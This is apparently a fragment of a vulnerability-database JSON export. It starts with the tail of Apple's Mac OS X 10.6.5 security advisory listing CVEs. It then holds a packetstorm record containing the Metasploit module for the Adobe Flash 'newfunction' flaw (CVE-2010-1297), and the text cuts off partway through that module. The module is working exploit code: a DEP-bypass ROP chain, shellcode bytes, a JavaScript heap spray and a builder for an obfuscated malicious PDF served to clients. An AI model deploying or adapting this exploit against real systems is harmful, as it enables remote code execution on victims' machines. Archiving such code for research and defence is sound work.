arbitrary code execution. This issue is addressed through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.6. Credit to Aki Helin of the Oulu University Secure Programming Group for reporting this issue.\r\n\r\n *\r\n\r\n gzip\r\n\r\n CVE-ID: CVE-2009-2624\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An buffer overflow exists in gzip. Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management.\r\n\r\n *\r\n\r\n Image Capture\r\n\r\n CVE-ID: CVE-2010-1844\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Downloading a maliciously crafted image may lead to an unexpected system shutdown\r\n\r\n Description: A unbounded memory consumption issue exists in Image Capture. Downloading a maliciously crafted image may lead to an unexpected system shutdown. This issue is addressed through improved input validation. This issue does not affect systems prior to Mac OS X v10.6. Credit to Steven Fisher of Discovery Software Ltd. for reporting this issue.\r\n\r\n *\r\n\r\n ImageIO\r\n\r\n CVE-ID: CVE-2010-1845\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted PSD image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: Multiple memory corruption issues exist in ImageIO's handling of PSD images. Viewing a maliciously crafted PSD image may lead to an unexpected application termination or arbitrary code execution. These issues are addressed through improved validation of PSD images. Credit to Dominic Chell of NGSSoftware for reporting one of these issues.\r\n\r\n *\r\n\r\n ImageIO\r\n\r\n CVE-ID: CVE-2010-1811\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in the handling of TIFF Images. Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n ImageIO\r\n\r\n CVE-ID: CVE-2010-2249, CVE-2010-1205\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in libpng\r\n\r\n Description: libpng is updated to version 1.4.3 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html\r\n\r\n *\r\n\r\n Image RAW\r\n\r\n CVE-ID: CVE-2010-1846\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted RAW image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in Image RAW's handling of images. Viewing a maliciously crafted RAW image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n Kernel\r\n\r\n CVE-ID: CVE-2010-1847\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A local user may cause an unexpected system shutdown\r\n\r\n Description: A memory management issue in the handling of terminal devices may allow a local user to cause an unexpected system shutdown. This issue is addressed through improved memory management.\r\n\r\n *\r\n\r\n MySQL\r\n\r\n CVE-ID: CVE-2010-1848, CVE-2010-1849, CVE-2010-1850\r\n\r\n Available for: Mac OS X Server v10.5.8, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in MySQL 5.0.88\r\n\r\n Description: MySQL is updated to version 5.0.91 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. MySQL is only provided with Mac OS X Server systems. Further information is available via the MySQL web site at http://dev.mysql.com/doc/refman/5.0/en/news-5-0-91.html\r\n\r\n *\r\n\r\n neon\r\n\r\n CVE-ID: CVE-2009-2473, CVE-2009-2474\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in neon 0.28.3\r\n\r\n Description: neon is updated to version 0.28.6 to address several vulnerabilities, the most serious of which may allow a man-in-the-middle attacker to redirect connections and intercept user credentials or other sensitive information. Further information is available via the neon web site at http://www.webdav.org/neon/\r\n\r\n *\r\n\r\n Networking\r\n\r\n CVE-ID: CVE-2010-1843\r\n\r\n Available for: Mac OS X v10.6.2 through v10.6.4, Mac OS X Server v10.6.2 through v10.6.4\r\n\r\n Impact: A remote attacker may cause an unexpected system shutdown\r\n\r\n Description: A null pointer dereference issue exists in the handling of Protocol Independent Multicast (PIM) packets. By sending a maliciously crafted PIM packet, a remote attacker may cause an unexpected system shutdown. This issue is addressed through improved validation of PIM packets. This issue does not affect systems prior to Mac OS X v10.6.2. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n OpenLDAP\r\n\r\n CVE-ID: CVE-2010-0211\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause a denial of service or arbitrary code execution\r\n\r\n Description: A memory management issue exists in OpenLDAP. By sending a maliciously crafted query an attacker may cause a denial of service or arbitrary code execution. This issue is addressed through improved memory management.\r\n\r\n *\r\n\r\n OpenLDAP\r\n\r\n CVE-ID: CVE-2010-0212\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause a denial of service\r\n\r\n Description: A null pointer dereference exists in OpenLDAP. By sending a maliciously crafted query an attacker may cause a denial of service. This issue is addressed through improved memory management. Credit to Ilkka Mattila and Tuomas Salomaki for reporting this issue.\r\n\r\n *\r\n\r\n OpenSSL\r\n\r\n CVE-ID: CVE-2010-1378\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote user may bypass TLS authentication or spoof a trusted server\r\n\r\n Description: An arithmetic issue exists in OpenSSL's certificate validation. A remote user may bypass certificate validation steps, and cause OpenSSL to accept any certificate signed by a trusted root as valid. This issue is addressed through improved certificate validation. This issue does not affect systems prior to Mac OS X v10.6. This issue only affects the Mac OS X distribution of OpenSSL. Credit to Ryan Govostes of RPISEC for reporting this issue.\r\n\r\n *\r\n\r\n Password Server\r\n\r\n CVE-ID: CVE-2010-3783\r\n\r\n Available for: Mac OS X Server v10.5.8, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may be able to log in with an outdated password\r\n\r\n Description: An implementation issue in Password Server's handling of replication may cause passwords to not be replicated. A remote attacker may be able to log in to a system using an outdated password. This issue is addressed through improved handling of password replication. This issue only affects Mac OS X Server systems. Credit: Apple.\r\n\r\n *\r\n\r\n PHP\r\n\r\n CVE-ID: CVE-2010-0397, CVE-2010-2531\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in PHP 5.3.2\r\n\r\n Description: PHP is updated to version 5.3.3 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP website at http://www.php.net/\r\n\r\n *\r\n\r\n PHP\r\n\r\n CVE-ID: CVE-2010-0397, CVE-2010-2531, CVE-2010-2484\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\r\n\r\n Impact: Multiple vulnerabilities in PHP 5.2.12\r\n\r\n Description: PHP is updated to version 5.2.14 to address multiple vulnerabilities, the most serious of which may lead to arbitary code execution. Further information is available via the PHP website at http://www.php.net/\r\n\r\n *\r\n\r\n Printing\r\n\r\n CVE-ID: CVE-2010-3784\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Applications that use the PMPageFormatCreateWithDataRepresentation API may be vulnerable to an unexpected application termination\r\n\r\n Description: A null dereference issue exists in the PMPageFormatCreateWithDataRepresentation API's handling of XML data. Applications that use this API may be vulnerable to an unexpected application termination. This issue is addressed through improved handling of XML data. Credit to Wujun Li of Microsoft for reporting this issue.\r\n\r\n *\r\n\r\n python\r\n\r\n CVE-ID: CVE-2009-4134, CVE-2010-1449, CVE-2010-1450\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Python applications using the rgbimg and audioop modules may be vulnerable to an unexpected application termination or arbitrary code execution.\r\n\r\n Description: Multiple integer overflows exists in python's rgbimg and audioop modules. Python applications using the rgbimg and audioop modules may be vulnerable to an unexpected application termination or arbitrary code execution. These issues are addressed through improved bounds checking.\r\n\r\n *\r\n\r\n QuickLook\r\n\r\n CVE-ID: CVE-2010-3785\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow exists in QuickLook's handling of Microsoft Office files. Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n QuickLook\r\n\r\n CVE-ID: CVE-2010-3786\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Downloading a maliciously crafted Excel file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in QuickLook's handling of Excel files. Downloading a maliciously crafted Excel file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.6. Credit to Tobias Klein, working with VeriSign iDefense Labs for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3787\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in QuickTime's handling of JP2 images. Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to Nils of MWR InfoSecurity for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3788\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An uninitialized memory access issue exists in QuickTime's handling of JP2 images. Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of JP2 images. Credit to Damian Put and Procyun, working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3789\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted avi file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue is in QuickTime's handling of avi files. Viewing a maliciously crafted avi file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of avi files. Credit to Damian Put working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3790\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in QuickTime's handling of movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of movie files. Credit to Honggang Ren of Fortinet's FortiGuard Labs for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3791\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow exists in QuickTime's handling of MPEG encoded movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3792\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A signedness issue exists in QuickTime's handling of MPEG encoded movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of MPEG encoded movie files. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3793\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in the handling of Sorenson encoded movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of Sorenson encoded movie files. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative and Carsten Eiram of Secunia Research for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3794\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted FlashPix image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An uninitialized memory access issue exists in QuickTime's handling of FlashPix images. Viewing a maliciously crafted FlashPix image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3795\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted GIF image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An unitialized memory access issue exists in QuickTime's handling of GIF images. Viewing a maliciously crafted GIF image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n Safari RSS\r\n\r\n CVE-ID: CVE-2010-3796\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Accessing a maliciously crafted "feed:" URL may lead to the disclosure of sensitive information\r\n\r\n Description: Java applets are allowed in RSS feeds. Since Java applets can modify the loading DOM, accessing a maliciously crafted "feed:" URL may lead to the disclosure of sensitive information. This issue is addressed by disallowing Java applets in RSS feeds. Credit to Jason Hullinger of IOActive for reporting this issue.\r\n\r\n *\r\n\r\n Time Machine\r\n\r\n CVE-ID: CVE-2010-1803\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may access a user's Time Machine information\r\n\r\n Description: The user may designate a remote AFP volume to be used for Time Machine backups. Time Machine does not verify that the same physical device is being used for subsequent backup operations. An attacker who is able to spoof the remote AFP volume can gain access to the user's backup information. This issue is addressed by verifying the unique identifier associated with a disk for backup operations. This issue does not affect Mac OS X v10.5 systems. Credit to Renaud Deraison of Tenable Network Security, Inc. for reporting this issue.\r\n\r\n *\r\n\r\n Wiki Server\r\n\r\n CVE-ID: CVE-2010-3797\r\n\r\n Available for: Mac OS X Server v10.5.8, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A user who can edit wiki pages may obtain the credentials of other users\r\n\r\n Description: A JavaScript injection issue exists in Wiki Server. A user who can edit wiki pages may obtain the credentials of any user who visits the edited pages. This issue is addressed through improved input validation. This issue only affects Mac OS X Server systems. Credit: Apple.\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2010-1205, CVE-2010-2249, CVE-2010-0205\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in libpng version 1.2.41\r\n\r\n Description: Multiple vulnerabilities exist in libpng version 1.2.42, the most serious of which may lead to arbitrary code execution. These issues are addressed by updating to version 1.2.44. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2009-0946, CVE-2010-2497, CVE-2010-2498, CVE-2010-2499, CVE-2010-2500, CVE-2010-2519, CVE-2010-2520, CVE-2010-2805, CVE-2010-2806, CVE-2010-2807, CVE-2010-2808, CVE-2010-3053, CVE-2010-3054\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in FreeType 2.3.9\r\n\r\n Description: Multiple vulnerabilities exist in FreeType 2.3.9, the most serious of which may lead to arbitrary code execution when processing a maliciously crafted font. These issues are addressed by updating FreeType to version 2.4.2. Further information is available via the FreeType site at http://www.freetype.org/\r\n\r\n *\r\n\r\n xar\r\n\r\n CVE-ID: CVE-2010-3798\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Extracting a maliciously crafted xar archive may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in xar. Extracting a maliciously crafted xar archive may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.6. Credit: Apple.\r\n\r\n", "edition": 1, "modified": "2010-11-18T00:00:00", "published": "2010-11-18T00:00:00", "id": "SECURITYVULNS:DOC:25153", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25153", "title": "About the security content of Mac OS X v10.6.5 and Security Update 2010-007", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:29", "description": "", "published": "2010-06-15T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player newfunction Invalid Pointer Use", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2010-06-15T00:00:00", "id": "PACKETSTORM:90665", "href": "https://packetstormsecurity.com/files/90665/Adobe-Flash-Player-newfunction-Invalid-Pointer-Use.html", "sourceData": "`## \n# $Id: adobe_flashplayer_newfunction.rb 9477 2010-06-10 20:55:17Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \nrequire 'zlib' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player \"newfunction\" Invalid Pointer Use', \n'Description' => %q{ \nThis module exploits a vulnerability in the DoABC tag handling within \nversions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also \nvulnerable, as are any other applications that may embed Flash player. \n \nArbitrary code executiong is achieved by embedding a specially crafted Flash \nmovie into a PDF document. An AcroJS heap spray is used in order to ensure \nthat the memory used by the invalid pointer issue is controlled. \n \nNOTE: This module uses a similar DEP bypass method to that used within the \nadobe_libtiff module. This method is unlikely to work across various \nWindows versions due a the hardcoded syscall number. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Found being openly exploited \n'jduck' # Metasploit version \n], \n'Version' => '$Revision: 9477 $', \n'References' => \n[ \n['CVE', '2010-1297'], \n['OSVDB', '65141'], \n['BID', '40586'], \n['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'], \n# For SWF->PDF embedding \n['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/'] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'HTTP::compression' => 'gzip', \n'HTTP::chunked' => true, \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Payload' => \n{ \n'Space' => 1000, \n'BadChars' => \"\\x00\", \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd \n# Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd \n# Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd \n[ 'Automatic', { }], \n], \n'DisclosureDate' => 'Jun 04 2010', \n'DefaultTarget' => 0)) \nend \n \ndef exploit \n# load the static swf file \npath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2010-1297.swf\" ) \nfd = File.open( path, \"rb\" ) \n@swf_data = fd.read(fd.stat.size) \nfd.close \n \nsuper \nend \n \ndef on_request_uri(cli, request) \n \nprint_status(\"Sending crafted PDF w/SWF to #{cli.peerhost}:#{cli.peerport}\") \n \njs_data = make_js(regenerate_payload(cli).encoded) \npdf_data = make_pdf(@swf_data, js_data) \nsend_response(cli, pdf_data, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' }) \n \n# Handle the payload \nhandler(cli) \nend \n \n \ndef make_js(encoded_payload) \n \n# The following executes a ret2lib using BIB.dll \n# The effect is to bypass DEP and execute the shellcode in an indirect way \nstack_data = [ \n0xc0c0c0c, \n0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret \n0xcccccccc, \n0x70048ef, # xchg eax,esp / ret \n0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8] \n0xcccccccc, \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009033, # ret 0x18 \n0x7009084, # ret \n0xc0c0c0c, \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7001599, # pop ebp / ret \n0x10124, \n0x70072f7, # pop eax / ret \n0x10104, \n0x70015bb, # pop ecx / ret \n0x1000, \n0x700154d, # mov [eax], ecx / ret \n0x70015bb, # pop ecx / ret \n0x7ffe0300, # -- location of KiFastSystemCall \n0x7007fb2, # mov eax, [ecx] / ret \n0x70015bb, # pop ecx / ret \n0x10011, \n0x700a8ac, # mov [ecx], eax / xor eax,eax / ret \n0x70015bb, # pop ecx / ret \n0x10100, \n0x700a8ac, # mov [ecx], eax / xor eax,eax / ret \n0x70072f7, # pop eax / ret \n0x10011, \n0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?) \n0x7005c54, # pop esi / add esp,0x14 / ret \n0xffffffff, \n0x10100, \n0x0, \n0x10104, \n0x1000, \n0x40, \n# The next bit effectively copies data from the interleaved stack to the memory \n# pointed to by eax \n# The data copied is: \n# \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83 \n# \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff \n# \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90 \n0x700d731, # mov eax, [ebp-0x24] / ret \n0x70015bb, # pop ecx / ret \n0x9054905a, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x5815eb5a, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x18891a8b, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x8304c083, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0xfb8104c2, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0xc0c0c0c, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x5ebee75, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0xffffe6e8, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x909090ff, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x90909090, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x90909090, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x90ffffff, \n0x700154d, # mov [eax], ecx / ret \n0x700d731, # mov eax, [ebp-0x24] / ret \n0x700112f # call eax -- (execute stub to transition to full shellcode) \n].pack('V*') \n \nvar_unescape = rand_text_alpha(rand(100) + 1) \nvar_shellcode = rand_text_alpha(rand(100) + 1) \n \nvar_start = rand_text_alpha(rand(100) + 1) \n \nvar_s = 0x10000 \nvar_c = rand_text_alpha(rand(100) + 1) \nvar_b = rand_text_alpha(rand(100) + 1) \nvar_d = rand_text_alpha(rand(100) + 1) \nvar_3 = rand_text_alpha(rand(100) + 1) \nvar_i = rand_text_alpha(rand(100) + 1) \nvar_4 = rand_text_alpha(rand(100) + 1) \n \npayload_buf = '' \npayload_buf << stack_data \npayload_buf << encoded_payload \n \nescaped_payload = Rex::Text.to_unescape(payload_buf) \n \njs = %Q| \nvar #{var_unescape} = unescape; \nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' ); \nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" ); \nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c}; \n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2); \n#{var_b} += #{var_shellcode}; \n#{var_b} += #{var_c}; \n#{var_d} = #{var_b}.substring(0, #{var_s}/2); \nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d}; \n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2); \nvar #{var_4} = new Array(); \nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\"; \n| \n \njs \nend \n \ndef RandomNonASCIIString(count) \nresult = \"\" \ncount.times do \nresult << (rand(128) + 128).chr \nend \nresult \nend \n \ndef ioDef(id) \n\"%d 0 obj\\n\" % id \nend \n \ndef ioRef(id) \n\"%d 0 R\" % id \nend \n \n \n#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ \ndef nObfu(str) \nresult = \"\" \nstr.scan(/./u) do |c| \nif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' \nresult << \"#%x\" % c.unpack(\"C*\")[0] \nelse \nresult << c \nend \nend \nresult \nend \n \n \ndef ASCIIHexWhitespaceEncode(str) \nresult = \"\" \nwhitespace = \"\" \nstr.each_byte do |b| \nresult << whitespace << \"%02x\" % b \nwhitespace = \" \" * (rand(3) + 1) \nend \nresult << \">\" \nend \n \n \ndef make_pdf(swf, js) \n \nswf_name = rand_text_alpha(8 + rand(8)) + \".swf\" \n \nxref = [] \neol = \"\\n\" \nendobj = \"endobj\" << eol \n \n# Randomize PDF version? \npdf = \"%PDF-1.5\" << eol \n#pdf << \"%\" << RandomNonASCIIString(4) << eol \n \n# catalog \nxref << pdf.length \npdf << ioDef(1) << nObfu(\"<</Type/Catalog\") \npdf << nObfu(\"/Pages \") << ioRef(3) \npdf << nObfu(\"/OpenAction \") << ioRef(5) \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# pages array \nxref << pdf.length \npdf << ioDef(3) << nObfu(\"<</Type/Pages/Count 1/Kids [\") << ioRef(4) << nObfu(\"]>>\") << eol << endobj \n \n# page 1 \nxref << pdf.length \npdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << 